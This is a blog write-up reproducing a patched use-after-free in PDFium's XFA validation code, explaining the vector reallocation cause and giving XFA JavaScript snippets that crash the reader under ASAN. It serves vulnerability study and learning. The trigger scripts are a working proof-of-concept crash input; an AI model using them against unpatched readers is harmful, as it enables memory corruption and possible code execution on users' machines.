Reproduction of PDFium Issue #933163

Use-after-Free vulnerability on CXFA_FFDocView::RunValidate()

Table of Contents

Introduction

I have always wanted to learn exploitation of the Chromium V8 Engine and its components, and this desire actually originally stemmed from CTFs, since there were quite a few CTFs that had pwn questions related to Chromium V8 exploitation. When my supervisor from my internship told me that I could try reproducing a now-patched security vulnerability to learn PDFium, which is Chromium’s open-source PDF reader based heavily on Foxit Reader, obviously I jumped straight on the idea.

This was the journey of discovering the source of the bug and making attempts to exploit it.

Link to bug: https://bugs.chromium.org/p/chromium/issues/detail?id=933163

First Steps

Since the both of us were generally new C++ as well as PDF format and parsing, we had to crash course some elements of C++ as well as figure out how PDFs are handled by a PDF viewer, which made this an interesting ride.

In this bug, there is a Use-after-Free vulnerability on the RunValidate()function of CXFA_FFDocView class. Let's take a look at the vulnerable (pre-patched) function.

bool CXFA_FFDocView::RunValidate() {

  if (!m_pDoc->GetDocEnvironment()->IsValidationsEnabled(m_pDoc.Get()))
    return false;

  for (CXFA_Node* node : m_ValidateNodes) {
    if (!node->HasRemovedChildren())
      node->ProcessValidate(this, 0);
  }

  m_ValidateNodes.clear();
  return true;
}

We can break down the function as follows:

  1. Firstly, RunValidate() will be called if validation is requested (this can be inferred by finding instances where RunValidate()is called.
  2. If validation is not enabled, RunValidate()returns false and does not run validation script.
  3. The for loop iterates through m_ValidateNodes(with an iterator), and if a node does not have removed children it would run ProcessValidate()on the nodes.
  4. m_ValidateNodes.clear()is run to destroy all elements of m_ValidateNodes to prepare it again for more possible validation.

So, we know that the bug is a UaF, which means that there has to be something in here that somehow frees memory while another object is still trying to access it. Because IsValidationsEnabled() shouldn't affect any read/write data, the problem has to lie within the for loop. The iterator seems to be the only possible source of the problem for a UaF vulnerability.

If we take a look at the patch, we can see that the problem was fixed by calling the move constructor on m_ValidateNodes before iterating through it. Bingo, the problem does lie with the iterator. But just how does it work? This was where our lack of C++ knowledge initially gated us from reaching a definitive answer, but once we got to know how vectors were defined, it got a lot easier.

In the simplest terms, vectors, if defined without a starting capacity, would start with capacity 0, then 1, 2, 4… and so on, doubling its capacity every time an object is pushed into it after it has already reached its capacity. When it expands its capacity, it will first copy all data to a temporary store, deallocate the space used by the old vector, malloc a new larger space (2n size) for the expanded vector, then copy all the data back from the temporary store into the expanded vector. Now that we knew vectors' data structure, we could jump back into seeing what exactly was causing the UaF.

Finding the Vuln Function

First, without digging through the code, I just wanted to check if ProcessValidate() pushed into m_ValidateNodes potentially. I assumed it did, since:

  1. In the patched code there was a comment // May have created more nodes to validate, try again after the for loop, which signified that nodes could have been added to m_ValidateNodes during ProcessValidate().
  2. There was nothing else in the for loop that could have potentially created more nodes to validate, since HasRemovedChildren() only returned a variable (0 or 1 in this case) and does not affect m_ValidateNodes.
  3. ProcessValidate() takes in the arg CXFA_FFDocView* docView, which means it has access to the concerned docView context, meaning it would be able to potentially change member variables of the docView.

We then theorized the scenario: if let's say the vector m_ValidateNodes hits its max backing store and ProcessValidate() adds a new node to m_ValidateNodes.

Then C++ would have to, as mentioned above, do something like (pseudocode)

base = m_ValidateNodes.backingstore
for (int i = 0; i < m_ValidateNodes.length; i++) {
  currnode = base[i]
  free(base)
  m_ValidateNodes.backingstore = malloc(newsize)
  m_ValidateNodes.length = newsize
}

in order to increase its backing store. This is how a Vector achieves O(1) amortized time for push_back(). This also means that the memory allocated to m_ValidateNodes would have now potentially (and most likely) changed.

Because ProcessValidate() is called within the for loop, which loops through addresses of the current m_ValidateNodes, if m_ValidateNodes were to have to increase its backing store size, it would mean that the actual pointers in m_ValidateNodes would have already changed, but the iterated pointer node in the for loop for (CXFA_Node* node: m_ValidateNodes) still pointed to the "old" location of m_ValidateNodes, which is now freed. Thus, the iterated node is viewed as a valid variable, but when ProcessValidate() is run, it would try to use the faulty pointer (which points to the now-freed space), causing a SIGSEGV.

This leads to UaF and thus potential RCE.

Confirming the Vulnerability

We have just based the above theory on an assumption. Although the assumption is very well justified, as there is almost no other possible way for m_ValidateNodes to have been changed, we still need to confirm that ProcessValidate() does add nodes before we move forward. PDFium is part of Chromium, which runs on the Chromium V8 Engine, which always has wrappers upon wrappers, so we had to unravel the function.

ProcessValidate() is run on the CXFA_Node class, so a quick look at CXFA_Node.h reveals that there is indeed a prototype function for ProcessValidate() in there that accepts a param CXFA_FFDocView* docView, which is the object we want to look at. A quick look at ProcessValidate() reveals many functions that are being called, but to narrow down on the correct function we only looked for functions called on docView, and there were only 2 instances of this happening:

bool bStatus = docView->GetLayoutStatus() < XFA_DOCVIEW_LAYOUTSTATUS_End;

and

if (script) {
  CXFA_EventParam eParam;
  eParam.m_eType = XFA_EVENT_Validate;
  eParam.m_pTarget = this;
  std::tie(iRet, bRet) = ExecuteBoolScript(docView, script, &amp;eParam);
}

We know GetLayoutStatus() could not have added or removed nodes as it only returns a flag to compare against XFA_DOCVIEW_LAYOUTSTATUS_End. So the answer should lie within ExecuteBoolScript(docView, script, &Param). We take a look at ExecuteBoolScript(), and we realized that what ExecuteBoolScript() does was to run any validation script attached to the node and return a Boolean on whether the node is valid or not valid.

Attempting an Exploit

This is where the fun part comes in, with just this knowledge, it was already sort of possible to build an exploit. Because we know that the vector m_ValidateNodes was not initialized with a starting capacity (from the header file), we can first assume the use of C++'s default vector capacity allocation: 0, 1, 2, 4, 8, 16…

<event activity="docReady" ref="$host">
  <script contentType="application/x-javascript">
    xfa.host.setFocus("my_doc.combox_0.combox");
    var val=xfa.resolveNode("my_doc.combox_0.combox");
    val.rawValue="1";
	xfa.host.setFocus("my_doc.combox_1.combox");
	xfa.host.openList("my_doc.combox_0.combox");
  </script>
</event>

This puts 1 node into m_ValidateNodes at the start, and calling openList will call RunValidate(), with the following validate script on combox_0:

<validate>
  <script contentType="application/x-javascript">
    xfa.host.setFocus("my_doc.combox_1.combox");
	var val=xfa.resolveNode("my_doc.combox_1.combox");
	val.rawValue="1";
	xfa.host.setFocus("my_doc.combox_0.combox");
  </script>
</validate>

What we want is to change a value and add it to m_ValidateNodes while validating a node so that m_ValidateNodes would have exceeded its current capacity and would thus need to increase its backing store mid-validation.

However, running this did not produce any error:

Hmm, what could be the problem? Let's try increasing the amount of combo boxes by 1, since we assumed initially that the backing store would be 0, 1, 2, 4…, and it turned out that the backing store didn't need to increase from 1 to 2, if we have 2 objects initially in the vector and add a third, it would surely have to increase its capacity from 2 to 4 right?

We add a third combo box, combox_2 with the exact same format as combox_1, and instead also modify the value of combox_1 on docReady event so that m_ValidateNodes would have 2 objects before RunValidate() is executed:

<event activity="docReady" ref="$host">
  <script contentType="application/x-javascript">
	xfa.host.setFocus("my_doc.combox_0.combox");
	var val=xfa.resolveNode("my_doc.combox_0.combox");
	val.rawValue="1";
	xfa.host.setFocus("my_doc.combox_1.combox");
	var val1=xfa.resolveNode("my_doc.combox_1.combox");
	val1.rawValue="1";
	xfa.host.setFocus("my_doc.combox_2.combox");
	xfa.host.openList("my_doc.combox_0.combox");
  </script>
</event>

And we modify the validate script of combox_0 so that it changes the value of combox_2 instead of combox_1 so that we add a third node to m_ValidateNodes which theoretically should have a backing store of 2.

This time when we ran the pdf through pdfium, we got a SIGSEGV. This is one big step towards success, but we're not completely in the clear yet.

We can see that the SIGSEGV occurs on the function HasFlag(), which is a good sign since this function is called inside ProcessValidate(), which is called within the exploitable for loop. We load the pdf using pdfium with ASAN enabled, and we get the following:

Great, we have now reproduced the UaF vulnerability. As a double-check, we load the exploit pdf provided on the bug report in both in gdb and in CLI with asan enabled:

The SIGSEGV occurred at the same place, with HasFlag() having the same arg this=0x100010001.

The address that the UaF occurred on seemed to be different in both PDFs, but that shouldn't matter because different PDF layouts were used in both PDFs.

This is a graph roughly explaining the logic flow when parsing the exploit pdf:

Thus, we have achieved UaF with the bug in issue #933163.

Afterword

We still don't completely understand the inner workings of pdfium because we did not go through the code base thoroughly, and we did do a bit of calculated guessing to be able to land the reproduction of the exploit. There are still a lot of functions where we didn't know exactly when would be called within the CXFA_FFDocView and CXFA_Node classes, but we believe we generally understand the cause for this exploit and how we can trigger it.

Thanks for reading.

<

Learning To Harness: Crash Coursing C

Part 1: Understanding structs and pointers in a harness

>

Writeup for RedPwnCTF 2020 coffer-overflow-0, 1, 2

Beginners Pwn

📚